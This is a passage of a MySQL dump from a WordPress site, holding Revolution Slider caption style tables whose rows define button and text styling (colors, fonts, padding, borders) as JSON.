(105,'.tp-caption.Gym-Button-Light','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#72a800\",\"background-transparency\":\"0\",\"border-color\":\"#8bc027\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"2px\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"power2.inOut\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"15px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"12px\",\"35px\",\"12px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.25\",\"border-style\":\"solid\",\"border-width\":\"2px\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(106,'.tp-caption.Sports-Button-Light','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"500\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"17px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"12px\",\"35px\",\"12px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.5\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(107,'.tp-caption.Sports-Button-Red','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"#000000\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"500\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"17px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"12px\",\"35px\",\"12px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#db1c22\",\"background-transparency\":\"1\",\"border-color\":\"#db1c22\",\"border-transparency\":\"0\",\"border-style\":\"solid\",\"border-width\":\"2px\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(108,'.tp-caption.Photography-Button','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"300\",\"easing\":\"power3.out\"}','{\"idle\":{\"letter-spacing\":\"1px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"15px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"13px\",\"35px\",\"13px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.25\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(109,'.tp-caption.Newspaper-Button-2','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"3px\",\"3px\",\"3px\",\"3px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"none\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"15px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"10px\",\"30px\",\"10px\",\"30px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.5\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"3px\",\"3px\",\"3px\",\"3px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}');
/*!40000 ALTER TABLE `dnctiavkr_revslider_css` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_revslider_css_bkp`
--

DROP TABLE IF EXISTS `dnctiavkr_revslider_css_bkp`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_revslider_css_bkp` (
  `id` int(9) NOT NULL AUTO_INCREMENT,
  `handle` text NOT NULL,
  `settings` longtext DEFAULT NULL,
  `hover` longtext DEFAULT NULL,
  `advanced` longtext DEFAULT NULL,
  `params` longtext NOT NULL,
  PRIMARY KEY (`id`),
  KEY `handle_index` (`handle`(64))
) ENGINE=InnoDB AUTO_INCREMENT=48 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_revslider_css_bkp`
--

LOCK TABLES `dnctiavkr_revslider_css_bkp` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_revslider_css_bkp` DISABLE KEYS */;
INSERT INTO `dnctiavkr_revslider_css_bkp` VALUES
(1,'.tp-caption.medium_grey',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"font-weight\":\"700\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-family\":\"Arial\",\"padding\":\"2px 4px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"background-color\":\"#888\",\"white-space\":\"nowrap\"}'),
(2,'.tp-caption.small_text',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"font-weight\":\"700\",\"font-size\":\"14px\",\"line-height\":\"20px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\"}'),
(3,'.tp-caption.medium_text',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"font-weight\":\"700\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\"}'),
(4,'.tp-caption.large_text',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"font-weight\":\"700\",\"font-size\":\"40px\",\"line-height\":\"40px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\"}'),
(5,'.tp-caption.very_large_text',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"font-weight\":\"700\",\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\",\"letter-spacing\":\"-2px\"}'),
(6,'.tp-caption.very_big_white',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"none\",\"font-weight\":\"800\",\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\",\"padding\":\"0px 4px\",\"padding-top\":\"1px\",\"background-color\":\"#000\"}'),
(7,'.tp-caption.very_big_black',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#000\",\"text-shadow\":\"none\",\"font-weight\":\"700\",\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\",\"padding\":\"0px 4px\",\"padding-top\":\"1px\",\"background-color\":\"#fff\"}'),
(8,'.tp-caption.modern_medium_fat',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#000\",\"text-shadow\":\"none\",\"font-weight\":\"800\",\"font-size\":\"24px\",\"line-height\":\"20px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\"}'),
(9,'.tp-caption.modern_medium_fat_white',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"none\",\"font-weight\":\"800\",\"font-size\":\"24px\",\"line-height\":\"20px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\"}'),
(10,'.tp-caption.modern_medium_light',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#000\",\"text-shadow\":\"none\",\"font-weight\":\"300\",\"font-size\":\"24px\",\"line-height\":\"20px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\"}'),
(11,'.tp-caption.modern_big_bluebg',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"none\",\"font-weight\":\"800\",\"font-size\":\"30px\",\"line-height\":\"36px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"padding\":\"3px 10px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"background-color\":\"#4e5b6c\",\"letter-spacing\":\"0\"}'),
(12,'.tp-caption.modern_big_redbg',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"none\",\"font-weight\":\"300\",\"font-size\":\"30px\",\"line-height\":\"36px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"padding\":\"3px 10px\",\"padding-top\":\"1px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"background-color\":\"#de543e\",\"letter-spacing\":\"0\"}'),
(13,'.tp-caption.modern_small_text_dark',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#555\",\"text-shadow\":\"none\",\"font-size\":\"14px\",\"line-height\":\"22px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\"}'),
(14,'.tp-caption.boxshadow',NULL,NULL,NULL,'{\"-moz-box-shadow\":\"0px 0px 20px rgba(0, 0, 0, 0.5)\",\"-webkit-box-shadow\":\"0px 0px 20px rgba(0, 0, 0, 0.5)\",\"box-shadow\":\"0px 0px 20px rgba(0, 0, 0, 0.5)\"}'),
(15,'.tp-caption.black',NULL,NULL,NULL,'{\"color\":\"#000\",\"text-shadow\":\"none\"}'),
(16,'.tp-caption.noshadow',NULL,NULL,NULL,'{\"text-shadow\":\"none\"}'),
(17,'.tp-caption.thinheadline_dark',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"rgba(0,0,0,0.85)\",\"text-shadow\":\"none\",\"font-weight\":\"300\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"transparent\"}'),
(18,'.tp-caption.thintext_dark',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"rgba(0,0,0,0.85)\",\"text-shadow\":\"none\",\"font-weight\":\"300\",\"font-size\":\"16px\",\"line-height\":\"26px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"transparent\"}'),
(19,'.tp-caption.largeblackbg',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"none\",\"font-weight\":\"300\",\"font-size\":\"50px\",\"line-height\":\"70px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"#000\",\"padding\":\"0px 20px\",\"-webkit-border-radius\":\"0px\",\"-moz-border-radius\":\"0px\",\"border-radius\":\"0px\"}'),
(20,'.tp-caption.largepinkbg',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"none\",\"font-weight\":\"300\",\"font-size\":\"50px\",\"line-height\":\"70px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"#db4360\",\"padding\":\"0px 20px\",\"-webkit-border-radius\":\"0px\",\"-moz-border-radius\":\"0px\",\"border-radius\":\"0px\"}'),
(21,'.tp-caption.largewhitebg',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#000\",\"text-shadow\":\"none\",\"font-weight\":\"300\",\"font-size\":\"50px\",\"line-height\":\"70px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"#fff\",\"padding\":\"0px 20px\",\"-webkit-border-radius\":\"0px\",\"-moz-border-radius\":\"0px\",\"border-radius\":\"0px\"}'),
(22,'.tp-caption.largegreenbg',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"none\",\"font-weight\":\"300\",\"font-size\":\"50px\",\"line-height\":\"70px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"#67ae73\",\"padding\":\"0px 20px\",\"-webkit-border-radius\":\"0px\",\"-moz-border-radius\":\"0px\",\"border-radius\":\"0px\"}'),
(23,'.tp-caption.excerpt',NULL,NULL,NULL,'{\"font-size\":\"36px\",\"line-height\":\"36px\",\"font-weight\":\"700\",\"font-family\":\"Arial\",\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"rgba(0, 0, 0, 1)\",\"text-shadow\":\"none\",\"margin\":\"0px\",\"letter-spacing\":\"-1.5px\",\"padding\":\"1px 4px 0px 4px\",\"width\":\"150px\",\"white-space\":\"normal !important\",\"height\":\"auto\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 255, 255)\",\"border-style\":\"none\"}'),
(24,'.tp-caption.large_bold_grey',NULL,NULL,NULL,'{\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(102, 102, 102)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"text-shadow\":\"none\",\"margin\":\"0px\",\"padding\":\"1px 4px 0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(25,'.tp-caption.medium_thin_grey',NULL,NULL,NULL,'{\"font-size\":\"34px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(102, 102, 102)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"1px 4px 0px\",\"text-shadow\":\"none\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(26,'.tp-caption.small_thin_grey',NULL,NULL,NULL,'{\"font-size\":\"18px\",\"line-height\":\"26px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(117, 117, 117)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"1px 4px 0px\",\"text-shadow\":\"none\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(27,'.tp-caption.lightgrey_divider',NULL,NULL,NULL,'{\"text-decoration\":\"none\",\"background-color\":\"rgba(235, 235, 235, 1)\",\"width\":\"370px\",\"height\":\"3px\",\"background-position\":\"initial initial\",\"background-repeat\":\"initial initial\",\"border-width\":\"0px\",\"border-color\":\"rgb(34, 34, 34)\",\"border-style\":\"none\"}'),
(28,'.tp-caption.large_bold_darkblue',NULL,NULL,NULL,'{\"font-size\":\"58px\",\"line-height\":\"60px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(52, 73, 94)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(29,'.tp-caption.medium_bg_darkblue',NULL,NULL,NULL,'{\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(52, 73, 94)\",\"padding\":\"10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(30,'.tp-caption.medium_bold_red',NULL,NULL,NULL,'{\"font-size\":\"24px\",\"line-height\":\"30px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(227, 58, 12)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(31,'.tp-caption.medium_light_red',NULL,NULL,NULL,'{\"font-size\":\"21px\",\"line-height\":\"26px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(227, 58, 12)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(32,'.tp-caption.medium_bg_red',NULL,NULL,NULL,'{\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(227, 58, 12)\",\"padding\":\"10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(33,'.tp-caption.medium_bold_orange',NULL,NULL,NULL,'{\"font-size\":\"24px\",\"line-height\":\"30px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(243, 156, 18)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(34,'.tp-caption.medium_bg_orange',NULL,NULL,NULL,'{\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(243, 156, 18)\",\"padding\":\"10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(35,'.tp-caption.grassfloor',NULL,NULL,NULL,'{\"text-decoration\":\"none\",\"background-color\":\"rgba(160, 179, 151, 1)\",\"width\":\"4000px\",\"height\":\"150px\",\"border-width\":\"0px\",\"border-color\":\"rgb(34, 34, 34)\",\"border-style\":\"none\"}'),
(36,'.tp-caption.large_bold_white',NULL,NULL,NULL,'{\"font-size\":\"58px\",\"line-height\":\"60px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(37,'.tp-caption.medium_light_white',NULL,NULL,NULL,'{\"font-size\":\"30px\",\"line-height\":\"36px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(38,'.tp-caption.mediumlarge_light_white',NULL,NULL,NULL,'{\"font-size\":\"34px\",\"line-height\":\"40px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(39,'.tp-caption.mediumlarge_light_white_center',NULL,NULL,NULL,'{\"font-size\":\"34px\",\"line-height\":\"40px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px 0px 0px 0px\",\"text-align\":\"center\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(40,'.tp-caption.medium_bg_asbestos',NULL,NULL,NULL,'{\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(127, 140, 141)\",\"padding\":\"10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(41,'.tp-caption.medium_light_black',NULL,NULL,NULL,'{\"font-size\":\"30px\",\"line-height\":\"36px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(0, 0, 0)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(42,'.tp-caption.large_bold_black',NULL,NULL,NULL,'{\"font-size\":\"58px\",\"line-height\":\"60px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(0, 0, 0)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(43,'.tp-caption.mediumlarge_light_darkblue',NULL,NULL,NULL,'{\"font-size\":\"34px\",\"line-height\":\"40px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(52, 73, 94)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(44,'.tp-caption.small_light_white',NULL,NULL,NULL,'{\"font-size\":\"17px\",\"line-height\":\"28px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(45,'.tp-caption.roundedimage',NULL,NULL,NULL,'{\"border-width\":\"0px\",\"border-color\":\"rgb(34, 34, 34)\",\"border-style\":\"none\"}'),
(46,'.tp-caption.large_bg_black',NULL,NULL,NULL,'{\"font-size\":\"40px\",\"line-height\":\"40px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(0, 0, 0)\",\"padding\":\"10px 20px 15px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),
(47,'.tp-caption.mediumwhitebg',NULL,NULL,NULL,'{\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(0, 0, 0)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(255, 255, 255)\",\"padding\":\"5px 15px 10px\",\"text-shadow\":\"none\",\"border-width\":\"0px\",\"border-color\":\"rgb(0, 0, 0)\",\"border-style\":\"none\"}');
/*!40000 ALTER TABLE `dnctiavkr_revslider_css_bkp` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_revslider_layer_animations`
--

DROP TABLE IF EXISTS `dnctiavkr_revslider_layer_animations`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_revslider_layer_animations` (
  `id` int(9) NOT NULL AUTO_INCREMENT,
  `handle` text NOT NULL,
  `params` text NOT NULL,
  `settings` text DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_revslider_layer_animations`
--

LOCK TABLES `dnctiavkr_revslider_layer_animations` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_revslider_layer_animations` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_revslider_layer_animations` ENABLE KEYS */;
UNLOCK TABLES;

--
